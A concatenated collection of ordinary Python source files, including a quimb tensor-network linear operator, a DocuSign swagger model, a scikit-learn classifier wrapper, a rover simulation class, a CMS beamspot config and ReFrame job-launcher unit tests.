def outer_upper_ind_id(self):
return self._outer_upper_ind_id
@property
def inner_upper_ind_id(self):
return self._inner_upper_ind_id
@property
def inner_lower_ind_id(self):
return self._inner_lower_ind_id
@property
def outer_lower_ind_id(self):
return self._outer_lower_ind_id
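# Editorial usage sketch (not part of the original module): build a random
# superoperator with the geometry drawn in the class docstring above. The
# sizes used here are illustrative only.
def _demo_superoperator1d_usage():  # pragma: no cover
    S = SuperOperator1D.rand(n=6, K=3, chi=4, phys_dim=2, herm=True)
    # every site contributes an upper and a lower tensor
    assert S.num_tensors == 2 * S.L
    return S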
class TNLinearOperator1D(spla.LinearOperator):
r"""A 1D tensor network linear operator like::
start stop - 1
. .
:-O-O-O-O-O-O-O-O-O-O-O-O-: --+
: | | | | | | | | | | | | : |
:-H-H-H-H-H-H-H-H-H-H-H-H-: acting on --V
: | | | | | | | | | | | | : |
:-O-O-O-O-O-O-O-O-O-O-O-O-: --+
left_inds^ ^right_inds
Like :class:`~quimb.tensor.tensor_core.TNLinearOperator`, but performs a
structured contract from one end to the other that can handle very long
chains, possibly more efficiently, by contracting in blocks from one end.
Parameters
----------
tn : TensorNetwork
The tensor network to turn into a ``LinearOperator``.
left_inds : sequence of str
The left indices.
right_inds : sequence of str
The right indices.
start : int
Index of starting site.
stop : int
Index of stopping site (does not include this site).
ldims : tuple of int, optional
If known, the dimensions corresponding to ``left_inds``.
rdims : tuple of int, optional
If known, the dimensions corresponding to ``right_inds``.
See Also
--------
TNLinearOperator
"""
def __init__(self, tn, left_inds, right_inds, start, stop,
ldims=None, rdims=None, is_conj=False, is_trans=False):
self.tn = tn
self.start, self.stop = start, stop
if ldims is None or rdims is None:
ind_sizes = tn.ind_sizes()
ldims = tuple(ind_sizes[i] for i in left_inds)
rdims = tuple(ind_sizes[i] for i in right_inds)
self.left_inds, self.right_inds = left_inds, right_inds
self.ldims, ld = ldims, qu.prod(ldims)
self.rdims, rd = rdims, qu.prod(rdims)
self.tags = self.tn.tags
# conjugate the inputs/outputs rather than all the tensors if necessary
self.is_conj = is_conj
self.is_trans = is_trans
self._conj_linop = None
self._adjoint_linop = None
self._transpose_linop = None
super().__init__(dtype=self.tn.dtype, shape=(ld, rd))
def _matvec(self, vec):
in_data = reshape(vec, self.rdims)
if self.is_conj:
in_data = conj(in_data)
if self.is_trans:
i, f, s = self.start, self.stop, 1
else:
i, f, s = self.stop - 1, self.start - 1, -1
# add the vector to the right of the chain
tnc = self.tn | Tensor(in_data, self.right_inds, tags=['_VEC'])
tnc.view_like_(self.tn)
# tnc = self.tn.copy()
# tnc |= Tensor(in_data, self.right_inds, tags=['_VEC'])
# absorb it into the rightmost site
tnc ^= ['_VEC', self.tn.site_tag(i)]
# then do a structured contract along the whole chain
out_T = tnc ^ slice(i, f, s)
out_data = out_T.transpose_(*self.left_inds).data.ravel()
if self.is_conj:
out_data = conj(out_data)
return out_data
def _matmat(self, mat):
d = mat.shape[-1]
in_data = reshape(mat, (*self.rdims, d))
if self.is_conj:
in_data = conj(in_data)
if self.is_trans:
i, f, s = self.start, self.stop, 1
else:
i, f, s = self.stop - 1, self.start - 1, -1
# add the matrix to the right of the chain
in_ix = (*self.right_inds, '_mat_ix')
tnc = self.tn | Tensor(in_data, inds=in_ix, tags=['_VEC'])
tnc.view_like_(self.tn)
# tnc = self.tn.copy()
# tnc |= Tensor(in_data, inds=in_ix, tags=['_VEC'])
# absorb it into the rightmost site
tnc ^= ['_VEC', self.tn.site_tag(i)]
# then do a structured contract along the whole chain
out_T = tnc ^ slice(i, f, s)
out_ix = (*self.left_inds, '_mat_ix')
out_data = reshape(out_T.transpose_(*out_ix).data, (-1, d))
if self.is_conj:
out_data = conj(out_data)
return out_data
def copy(self, conj=False, transpose=False):
if transpose:
inds = (self.right_inds, self.left_inds)
dims = (self.rdims, self.ldims)
is_trans = not self.is_trans
else:
inds = (self.left_inds, self.right_inds)
dims = (self.ldims, self.rdims)
is_trans = self.is_trans
if conj:
is_conj = not self.is_conj
else:
is_conj = self.is_conj
return TNLinearOperator1D(self.tn, *inds, self.start, self.stop, *dims,
is_conj=is_conj, is_trans=is_trans)
def conj(self):
if self._conj_linop is None:
self._conj_linop = self.copy(conj=True)
return self._conj_linop
def _transpose(self):
if self._transpose_linop is None:
self._transpose_linop = self.copy(transpose=True)
return self._transpose_linop
def _adjoint(self):
"""Hermitian conjugate of this TNLO.
"""
# cache the adjoint
if self._adjoint_linop is None:
self._adjoint_linop = self.copy(conj=True, transpose=True)
return self._adjoint_linop
def to_dense(self):
T = self.tn ^ slice(self.start, self.stop)
if self.is_conj:
T = T.conj()
return T.to_dense(self.left_inds, self.right_inds)
@property
def A(self):
return self.to_dense()
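# Editorial usage sketch (not part of the original module). Since this class
# subclasses ``scipy.sparse.linalg.LinearOperator`` it can be handed straight
# to iterative solvers; ``MPO_ham_heis`` is assumed to exist in quimb.tensor.
def _demo_tn_linear_operator_1d():  # pragma: no cover
    import quimb.tensor as qtn

    n = 8
    H = qtn.MPO_ham_heis(n)
    lo = TNLinearOperator1D(
        H,
        left_inds=[H.upper_ind(i) for i in range(n)],
        right_inds=[H.lower_ind(i) for i in range(n)],
        start=0, stop=n,
    )
    # ground state energy estimate via an iterative eigensolver
    return spla.eigsh(lo, k=1, which='SA', return_eigenvectors=False)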
|
py | 1a331dcb2d7975964f9c948bee1535fb4cef60f0 | # terrascript/provider/archive.py
import terrascript
class archive(terrascript.Provider):
pass
__all__ = ["archive"]
|
py | 1a331dcd884f21484a1ac3d94ba07556bc93d021 | # coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign. # noqa: E501
OpenAPI spec version: v2.1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from docusign_esign.client.configuration import Configuration
class ReferralInformation(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'advertisement_id': 'str',
'enable_support': 'str',
'external_org_id': 'str',
'group_member_id': 'str',
'id_type': 'str',
'included_seats': 'str',
'industry': 'str',
'plan_start_month': 'str',
'promo_code': 'str',
'publisher_id': 'str',
'referral_code': 'str',
'referrer_name': 'str',
'sale_discount_amount': 'str',
'sale_discount_fixed_amount': 'str',
'sale_discount_percent': 'str',
'sale_discount_periods': 'str',
'sale_discount_seat_price_override': 'str',
'shopper_id': 'str'
}
attribute_map = {
'advertisement_id': 'advertisementId',
'enable_support': 'enableSupport',
'external_org_id': 'externalOrgId',
'group_member_id': 'groupMemberId',
'id_type': 'idType',
'included_seats': 'includedSeats',
'industry': 'industry',
'plan_start_month': 'planStartMonth',
'promo_code': 'promoCode',
'publisher_id': 'publisherId',
'referral_code': 'referralCode',
'referrer_name': 'referrerName',
'sale_discount_amount': 'saleDiscountAmount',
'sale_discount_fixed_amount': 'saleDiscountFixedAmount',
'sale_discount_percent': 'saleDiscountPercent',
'sale_discount_periods': 'saleDiscountPeriods',
'sale_discount_seat_price_override': 'saleDiscountSeatPriceOverride',
'shopper_id': 'shopperId'
}
def __init__(self, _configuration=None, **kwargs): # noqa: E501
"""ReferralInformation - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._advertisement_id = None
self._enable_support = None
self._external_org_id = None
self._group_member_id = None
self._id_type = None
self._included_seats = None
self._industry = None
self._plan_start_month = None
self._promo_code = None
self._publisher_id = None
self._referral_code = None
self._referrer_name = None
self._sale_discount_amount = None
self._sale_discount_fixed_amount = None
self._sale_discount_percent = None
self._sale_discount_periods = None
self._sale_discount_seat_price_override = None
self._shopper_id = None
self.discriminator = None
setattr(self, "_{}".format('advertisement_id'), kwargs.get('advertisement_id', None))
setattr(self, "_{}".format('enable_support'), kwargs.get('enable_support', None))
setattr(self, "_{}".format('external_org_id'), kwargs.get('external_org_id', None))
setattr(self, "_{}".format('group_member_id'), kwargs.get('group_member_id', None))
setattr(self, "_{}".format('id_type'), kwargs.get('id_type', None))
setattr(self, "_{}".format('included_seats'), kwargs.get('included_seats', None))
setattr(self, "_{}".format('industry'), kwargs.get('industry', None))
setattr(self, "_{}".format('plan_start_month'), kwargs.get('plan_start_month', None))
setattr(self, "_{}".format('promo_code'), kwargs.get('promo_code', None))
setattr(self, "_{}".format('publisher_id'), kwargs.get('publisher_id', None))
setattr(self, "_{}".format('referral_code'), kwargs.get('referral_code', None))
setattr(self, "_{}".format('referrer_name'), kwargs.get('referrer_name', None))
setattr(self, "_{}".format('sale_discount_amount'), kwargs.get('sale_discount_amount', None))
setattr(self, "_{}".format('sale_discount_fixed_amount'), kwargs.get('sale_discount_fixed_amount', None))
setattr(self, "_{}".format('sale_discount_percent'), kwargs.get('sale_discount_percent', None))
setattr(self, "_{}".format('sale_discount_periods'), kwargs.get('sale_discount_periods', None))
setattr(self, "_{}".format('sale_discount_seat_price_override'), kwargs.get('sale_discount_seat_price_override', None))
setattr(self, "_{}".format('shopper_id'), kwargs.get('shopper_id', None))
@property
def advertisement_id(self):
"""Gets the advertisement_id of this ReferralInformation. # noqa: E501
A complex type that contains the following information for entering referral and discount information. The following items are included in the referral information (all string content): enableSupport, includedSeats, saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, saleDiscountSeatPriceOverride, planStartMonth, referralCode, referrerName, advertisementId, publisherId, shopperId, promoCode, groupMemberId, idType, and industry. ###### Note: saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, and saleDiscountSeatPriceOverride are reserved for DocuSign use only. # noqa: E501
:return: The advertisement_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._advertisement_id
@advertisement_id.setter
def advertisement_id(self, advertisement_id):
"""Sets the advertisement_id of this ReferralInformation.
A complex type that contains the following information for entering referral and discount information. The following items are included in the referral information (all string content): enableSupport, includedSeats, saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, saleDiscountSeatPriceOverride, planStartMonth, referralCode, referrerName, advertisementId, publisherId, shopperId, promoCode, groupMemberId, idType, and industry. ###### Note: saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, and saleDiscountSeatPriceOverride are reserved for DocuSign use only. # noqa: E501
:param advertisement_id: The advertisement_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._advertisement_id = advertisement_id
@property
def enable_support(self):
"""Gets the enable_support of this ReferralInformation. # noqa: E501
When set to **true**, then customer support is provided as part of the account plan. # noqa: E501
:return: The enable_support of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._enable_support
@enable_support.setter
def enable_support(self, enable_support):
"""Sets the enable_support of this ReferralInformation.
When set to **true**, then customer support is provided as part of the account plan. # noqa: E501
:param enable_support: The enable_support of this ReferralInformation. # noqa: E501
:type: str
"""
self._enable_support = enable_support
@property
def external_org_id(self):
"""Gets the external_org_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The external_org_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._external_org_id
@external_org_id.setter
def external_org_id(self, external_org_id):
"""Sets the external_org_id of this ReferralInformation.
# noqa: E501
:param external_org_id: The external_org_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._external_org_id = external_org_id
@property
def group_member_id(self):
"""Gets the group_member_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The group_member_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._group_member_id
@group_member_id.setter
def group_member_id(self, group_member_id):
"""Sets the group_member_id of this ReferralInformation.
# noqa: E501
:param group_member_id: The group_member_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._group_member_id = group_member_id
@property
def id_type(self):
"""Gets the id_type of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The id_type of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._id_type
@id_type.setter
def id_type(self, id_type):
"""Sets the id_type of this ReferralInformation.
# noqa: E501
:param id_type: The id_type of this ReferralInformation. # noqa: E501
:type: str
"""
self._id_type = id_type
@property
def included_seats(self):
"""Gets the included_seats of this ReferralInformation. # noqa: E501
The number of seats (users) included. # noqa: E501
:return: The included_seats of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._included_seats
@included_seats.setter
def included_seats(self, included_seats):
"""Sets the included_seats of this ReferralInformation.
The number of seats (users) included. # noqa: E501
:param included_seats: The included_seats of this ReferralInformation. # noqa: E501
:type: str
"""
self._included_seats = included_seats
@property
def industry(self):
"""Gets the industry of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The industry of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._industry
@industry.setter
def industry(self, industry):
"""Sets the industry of this ReferralInformation.
# noqa: E501
:param industry: The industry of this ReferralInformation. # noqa: E501
:type: str
"""
self._industry = industry
@property
def plan_start_month(self):
"""Gets the plan_start_month of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The plan_start_month of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._plan_start_month
@plan_start_month.setter
def plan_start_month(self, plan_start_month):
"""Sets the plan_start_month of this ReferralInformation.
# noqa: E501
:param plan_start_month: The plan_start_month of this ReferralInformation. # noqa: E501
:type: str
"""
self._plan_start_month = plan_start_month
@property
def promo_code(self):
"""Gets the promo_code of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The promo_code of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._promo_code
@promo_code.setter
def promo_code(self, promo_code):
"""Sets the promo_code of this ReferralInformation.
# noqa: E501
:param promo_code: The promo_code of this ReferralInformation. # noqa: E501
:type: str
"""
self._promo_code = promo_code
@property
def publisher_id(self):
"""Gets the publisher_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The publisher_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._publisher_id
@publisher_id.setter
def publisher_id(self, publisher_id):
"""Sets the publisher_id of this ReferralInformation.
# noqa: E501
:param publisher_id: The publisher_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._publisher_id = publisher_id
@property
def referral_code(self):
"""Gets the referral_code of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The referral_code of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._referral_code
@referral_code.setter
def referral_code(self, referral_code):
"""Sets the referral_code of this ReferralInformation.
# noqa: E501
:param referral_code: The referral_code of this ReferralInformation. # noqa: E501
:type: str
"""
self._referral_code = referral_code
@property
def referrer_name(self):
"""Gets the referrer_name of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The referrer_name of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._referrer_name
@referrer_name.setter
def referrer_name(self, referrer_name):
"""Sets the referrer_name of this ReferralInformation.
# noqa: E501
:param referrer_name: The referrer_name of this ReferralInformation. # noqa: E501
:type: str
"""
self._referrer_name = referrer_name
@property
def sale_discount_amount(self):
"""Gets the sale_discount_amount of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_amount of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_amount
@sale_discount_amount.setter
def sale_discount_amount(self, sale_discount_amount):
"""Sets the sale_discount_amount of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_amount: The sale_discount_amount of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_amount = sale_discount_amount
@property
def sale_discount_fixed_amount(self):
"""Gets the sale_discount_fixed_amount of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_fixed_amount of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_fixed_amount
@sale_discount_fixed_amount.setter
def sale_discount_fixed_amount(self, sale_discount_fixed_amount):
"""Sets the sale_discount_fixed_amount of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_fixed_amount: The sale_discount_fixed_amount of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_fixed_amount = sale_discount_fixed_amount
@property
def sale_discount_percent(self):
"""Gets the sale_discount_percent of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_percent of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_percent
@sale_discount_percent.setter
def sale_discount_percent(self, sale_discount_percent):
"""Sets the sale_discount_percent of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_percent: The sale_discount_percent of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_percent = sale_discount_percent
@property
def sale_discount_periods(self):
"""Gets the sale_discount_periods of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_periods of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_periods
@sale_discount_periods.setter
def sale_discount_periods(self, sale_discount_periods):
"""Sets the sale_discount_periods of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_periods: The sale_discount_periods of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_periods = sale_discount_periods
@property
def sale_discount_seat_price_override(self):
"""Gets the sale_discount_seat_price_override of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_seat_price_override of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_seat_price_override
@sale_discount_seat_price_override.setter
def sale_discount_seat_price_override(self, sale_discount_seat_price_override):
"""Sets the sale_discount_seat_price_override of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_seat_price_override: The sale_discount_seat_price_override of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_seat_price_override = sale_discount_seat_price_override
@property
def shopper_id(self):
"""Gets the shopper_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The shopper_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._shopper_id
@shopper_id.setter
def shopper_id(self, shopper_id):
"""Sets the shopper_id of this ReferralInformation.
# noqa: E501
:param shopper_id: The shopper_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._shopper_id = shopper_id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ReferralInformation, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ReferralInformation):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ReferralInformation):
return True
return self.to_dict() != other.to_dict()
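# Editorial usage sketch (not part of the generated client). The model is a
# plain keyword-argument container; the values below are made up.
def _demo_referral_information():  # pragma: no cover
    info = ReferralInformation(referral_code='FRIEND2020', included_seats='5')
    assert info.referral_code == 'FRIEND2020'
    return info.to_dict()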
|
py | 1a331e7cc3d6a21242e52000ec28aa93151714e5 | #!/usr/bin/env python3
from . import potcar
from . import poscar
from . import incar
from . import kpoints
from . import doscar
from . import outcar
from . import wavecar
from . import chgcar
from . import chg
__all_modules__ = [
potcar,
poscar,
incar,
kpoints,
doscar,
outcar,
wavecar,
chgcar,
chg,
]
|
py | 1a331fd5c19d7cb3e51c10e29de67b09de27fab5 | #!/usr/bin/env python
from sklearn import svm
import numpy as np
from sklearn.externals import joblib
from sklearn import linear_model
import classifier.msg as msg
import os
SINGLE = 0
MULTIPLE = 1
def ini(path=None):
'''initialization
Args:
Returns:
'''
global clf
clf = linear_model.LogisticRegression(class_weight='balanced') #LR
if path is not None:
if os.path.exists(path):
clf = joblib.load(path)
msg.timemsg('Loaded classifier from: {}'.format(path))
else:
msg.timemsg('Path to classifier does not exist: {}'.format(path))
# SVM
#clf = svm.SVC(kernel='linear', C = 1.0) # SVM
def train(features, labels, path='clf.pkl'):
'''Train the classifier and dump it to disk.
Args:
features (list): Features
labels (list): Labels
path (str): Where to dump the trained classifier
Returns:
'''
global clf
msg.timemsg("train_shape: {}".format(features.shape))
msg.timemsg('Start training')
clf.fit(features, labels)
msg.timemsg('Finished training')
try:
joblib.dump(clf, path)
msg.timemsg('Dumped classifier')
except:
msg.timemsg('Failed to dump classifier!')
def predict(X, mode):
'''Predict labels for the given features.
Args:
X (array-like): Feature vector (SINGLE) or feature matrix (MULTIPLE)
mode (int): SINGLE or MULTIPLE
Returns:
prediction (list)
'''
global clf
if (mode == MULTIPLE): # many features
#msg.timemsg("predict_shape: {}".format(X.shape))
return clf.predict(X)
if (mode == SINGLE):
return np.squeeze(np.array(clf.predict(X.reshape(1,-1)))) # convert to array, one dimension too much, remove it
def save(folder):
'''Save the classifier as a .pkl file
Args:
folder: Path of the .pkl file to write
Returns:
'''
global clf
joblib.dump(clf, folder)
def load(folder):
'''Load the classifier from a .pkl file
Args:
folder: Path of the .pkl file to read
Returns:
'''
global clf
clf = joblib.load(folder)
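# Editorial usage sketch (not part of the module). The expected call order is
# ``ini`` -> ``train`` -> ``predict``; the toy features and the dump path are
# made up for illustration.
def _demo_classifier_usage():  # pragma: no cover
    X = np.array([[0.0, 1.0], [1.0, 0.0], [0.9, 0.1], [0.1, 0.9]])
    y = np.array([0, 1, 1, 0])
    ini()                                   # fresh LogisticRegression
    train(X, y, path='clf_demo.pkl')        # fits and dumps the model
    return predict(X, MULTIPLE), predict(X[0], SINGLE)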
|
py | 1a332025cf6adb173a13a84fa1874610be7d7d81 | #!/usr/bin/env python
import subprocess
with open("output.txt", "w+") as output:
i = 1
while i < 51:
fName = '{:0>3}.txt'.format(i)
subprocess.call(["python", "./reuters_experiment.py", fName], stdout=output);
i += 1 |
py | 1a3320315424c0a1da18cdc9e918996892943d31 | from rover.RoverHelpers import compute_energy_drain
class Rover:
"""Contains the mechanism that controls the rover"""
def __init__(self):
self.default_battery_level = 100
self.battery_level = self.default_battery_level
self.location = [0.0, 0.0, 0.0]
self.battery_base_movement = 10
self.max_height_change = 100
self.mass = 185
def reset_battery(self):
self.battery_level = self.default_battery_level
def get_movement_direction(self):
# Logic for movement goes here. You are allowed to store whatever you want. You are not allowed to change any
# of the self variables. They are here for your information only. They will be adjusted by the simulation.
# direction must be set to NORTH, SOUTH, EAST, or WEST
direction = "NORTH"
# This must be the last statement in this function.
return direction
def move_rover(self, new_location):
battery_adjustment = compute_energy_drain(new_location, self.location, self)
self.location = new_location
self.battery_level = self.battery_level - battery_adjustment
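# Editorial usage sketch (not part of the module). A single hand-driven step
# with a made-up target location; the real simulation calls these methods on
# the competitor's behalf.
def _demo_rover_step():  # pragma: no cover
    rover = Rover()
    heading = rover.get_movement_direction()   # e.g. "NORTH"
    rover.move_rover([0.0, 1.0, 0.0])          # battery drains via the helper
    return heading, rover.battery_level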
|
py | 1a33203dc8492db600b550cf6557870a98196650 | import FWCore.ParameterSet.Config as cms
process = cms.Process("write2DB")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.load("CondCore.CondDB.CondDB_cfi")
#################################
# Produce a SQLITE FILE
process.CondDB.connect = "SQLITEFILE"
#################################
process.PoolDBOutputService = cms.Service("PoolDBOutputService",
process.CondDB,
toPut = cms.VPSet(cms.PSet(record = cms.string('BeamSpotObjectsRcd'),
tag = cms.string('TAGNAME')
)
),
timetype = cms.untracked.string('TIMETYPE'),
loadBlobStreamer = cms.untracked.bool(False)
)
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(1))
process.beamspot = cms.EDAnalyzer("BeamSpotWrite2DB",
OutputFileName = cms.untracked.string('BEAMSPOTFILE')
)
process.p = cms.Path(process.beamspot)
# done.
|
py | 1a33205aefaf4012dee9098dd1520d45c89645f2 | # Copyright 2016-2020 Swiss National Supercomputing Centre (CSCS/ETH Zurich)
# ReFrame Project Developers. See the top-level LICENSE file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
import abc
import pytest
import reframe.core.launchers as launchers
from reframe.core.backends import getlauncher
from reframe.core.schedulers import Job, JobScheduler
@pytest.fixture(params=[
'alps', 'launcherwrapper', 'local', 'mpiexec',
'mpirun', 'srun', 'srunalloc', 'ssh', 'upcrun', 'upcxx-run'
])
def launcher(request):
if request.param == 'launcherwrapper':
# We set the registered_name for the LauncherWrapper just for
# convenience for the rest of the unit tests
wrapper_cls = launchers.LauncherWrapper
wrapper_cls.registered_name = 'launcherwrapper'
return wrapper_cls(
getlauncher('alps')(), 'ddt', ['--offline']
)
return getlauncher(request.param)()
@pytest.fixture
def make_job():
class FakeJobScheduler(JobScheduler):
def make_job(self, *args, **kwargs):
return Job(*args, **kwargs)
def emit_preamble(self, job):
pass
def submit(self, job):
pass
def wait(self, job):
pass
def cancel(self, job):
pass
def finished(self, job):
pass
def allnodes(self):
pass
def filternodes(self, job, nodes):
pass
def poll(self, *jobs):
pass
def _make_job(launcher, *args, **kwargs):
return Job.create(FakeJobScheduler(), launcher,
'fake_job', *args, **kwargs)
return _make_job
@pytest.fixture()
def job(make_job, launcher):
if type(launcher).registered_name == 'ssh':
access = ['-l user', '-p 22222', 'host']
else:
access = None
job = make_job(launcher,
script_filename='fake_script',
stdout='fake_stdout',
stderr='fake_stderr',
sched_access=access,
sched_exclusive_access='fake_exclude_access',
sched_options=['--fake'])
job.num_tasks = 4
job.num_tasks_per_node = 2
job.num_tasks_per_core = 1
job.num_tasks_per_socket = 1
job.num_cpus_per_task = 2
job.use_smt = True
job.time_limit = '10m'
job.options += ['--gres=gpu:4', '#DW jobdw anything']
job.launcher.options = ['--foo']
return job
@pytest.fixture
def minimal_job(make_job, launcher):
if type(launcher).registered_name == 'ssh':
access = ['host']
else:
access = None
minimal_job = make_job(launcher, sched_access=access)
minimal_job.launcher.options = ['--foo']
return minimal_job
def test_run_command(job):
launcher_name = type(job.launcher).registered_name
command = job.launcher.run_command(job)
if launcher_name == 'alps':
assert command == 'aprun -n 4 -N 2 -d 2 -j 0 --foo'
elif launcher_name == 'launcherwrapper':
assert command == 'ddt --offline aprun -n 4 -N 2 -d 2 -j 0 --foo'
elif launcher_name == 'local':
assert command == ''
elif launcher_name == 'mpiexec':
assert command == 'mpiexec -n 4 --foo'
elif launcher_name == 'mpirun':
assert command == 'mpirun -np 4 --foo'
elif launcher_name == 'srun':
assert command == 'srun --foo'
elif launcher_name == 'srunalloc':
assert command == ('srun '
'--job-name=fake_job '
'--time=0:10:0 '
'--output=fake_stdout '
'--error=fake_stderr '
'--ntasks=4 '
'--ntasks-per-node=2 '
'--ntasks-per-core=1 '
'--ntasks-per-socket=1 '
'--cpus-per-task=2 '
'--exclusive '
'--hint=multithread '
'--fake '
'--gres=gpu:4 '
'--foo')
elif launcher_name == 'ssh':
assert command == 'ssh -o BatchMode=yes -l user -p 22222 --foo host'
elif launcher_name == 'upcrun':
assert command == 'upcrun -N 2 -n 4 --foo'
elif launcher_name == 'upcxx-run':
assert command == 'upcxx-run -N 2 -n 4 --foo'
def test_run_command_minimal(minimal_job):
launcher_name = type(minimal_job.launcher).registered_name
command = minimal_job.launcher.run_command(minimal_job)
if launcher_name == 'alps':
assert command == 'aprun -n 1 --foo'
elif launcher_name == 'launcherwrapper':
assert command == 'ddt --offline aprun -n 1 --foo'
elif launcher_name == 'local':
assert command == ''
elif launcher_name == 'mpiexec':
assert command == 'mpiexec -n 1 --foo'
elif launcher_name == 'mpirun':
assert command == 'mpirun -np 1 --foo'
elif launcher_name == 'srun':
assert command == 'srun --foo'
elif launcher_name == 'srunalloc':
assert command == ('srun '
'--job-name=fake_job '
'--output=fake_job.out '
'--error=fake_job.err '
'--ntasks=1 '
'--foo')
elif launcher_name == 'ssh':
assert command == 'ssh -o BatchMode=yes --foo host'
elif launcher_name == 'upcrun':
assert command == 'upcrun -n 1 --foo'
elif launcher_name == 'upcxx-run':
assert command == 'upcxx-run -n 1 --foo'
|